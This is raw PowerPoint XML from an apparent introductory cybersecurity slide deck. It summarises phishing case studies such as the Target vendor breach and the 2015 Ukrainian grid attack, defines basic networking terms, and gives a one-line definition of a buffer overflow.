            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Employee trusted the email and wired the funds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CEO &amp; CFO were fired</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375119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Phishing Scams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Target/FMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cybercriminals targeted a third-party HVAC vendor (Fazio Mechanical Services) which had trusted access to Target’s servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>FMS did not realize the attack because the company was using a free anti-malware that did not provide real-time threat protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ukranian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Power Grid Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>December 23, 2015 – approximately 225,000 people lost power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Email phishing was the originating attack vector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Russian cyber-intelligence operatives had access to the power plant’s data and facilities for months prior to the attack (advanced persistent threat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Moscow World Cup Vacation Rental Scam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Email phishing scammers sent emails promising vacation rentals, free tickets, and more to World Cup fans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>No single organization – opportunistic attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Required intervention from the Federal Trade Commission to guide World Cup Fans to FIFA.com – the only official source for tickets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315233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Networking Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1131298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Networking Glossary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connection</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Refers to pieces of related information that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transfered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> through a network. This generally infers that a connection is built before the data transfer (by following the procedures laid out in a protocol) and then is deconstructed at the at the end of the data transfer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packet</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Generally speaking, the most basic unit that is transferred over a network. When communicating over a network, packets are the envelopes that carry your data (in pieces) from one end point to the other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Interface</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Can refer to any kind of software interface to networking hardware. For instance, if you have two network cards in your computer, you can control and configure each network interface associated with them individually.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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408374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Networking Glossary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2954655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LAN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Local Area Network</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It refers to a network or a portion of a network that is not publicly accessible to the greater internet. A home or office network is an example of a LAN.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WAN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Wide Area Network</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It means a network that is much more extensive than a LAN. While WAN is the relevant term to use to describe large, dispersed networks in general, it is usually meant to mean the internet, as a whole.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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16235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Networking Glossary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4370427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocol</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 protocol is a set of rules and standards that basically define a language that devices can use to communicate. There are a great number of protocols in use extensively in networking, and they are often implemented in different layers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port</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 port is an address on a single machine that can be tied to a specific piece of software. It is not a physical interface or location, but it allows your server to be able to communicate using more than one application.</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sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firewall</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 firewall is a program that decides whether traffic coming into a server or going out should be allowed.</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Usually works by creating rules for which type of traffic is acceptable on which ports.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Generally, firewalls block ports that are not used by a specific application on a server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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2846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Networking Glossary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NAT</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Network Address Translation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 way to translate requests that are incoming into a routing server to the relevant devices or servers that it knows about in the LAN.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This is usually implemented in physical LANs as a way to route requests through one IP address to the necessary backend servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VPN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Virtual Private Network</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It is a means of connecting separate LANs through the internet, while maintaining privacy.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This is used as a means of connecting remote systems as if they were on a local network, often for security reasons.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303606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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Providing more information than a computer’s memory has allocated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEE14ED-BEDA-4B9F-98C4-7956012D8B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3648478795"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2328890" y="2978896"/>
          <a:ext cx="8128000" cy="995453"/>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699542601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3997440616"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3096376603"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="862421901"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3232281122"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="43593071"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="990760732"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2729142630"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="995453">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2960973"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C88481A-35BE-4FD2-8C7C-0E272896CAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3044165788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2328890" y="4289198"/>
          <a:ext cx="8128000" cy="995453"/>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699542601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3997440616"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3096376603"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="862421901"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3232281122"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="43593071"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="990760732"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1016000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2729142630"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="995453">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4400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>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2960973"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A329594-8750-4072-B30F-9217A0F5054A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50425581"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1314838" y="5589312"/>
          <a:ext cx="9142056" cy="995453"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1799545537"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="699542601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3997440616"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
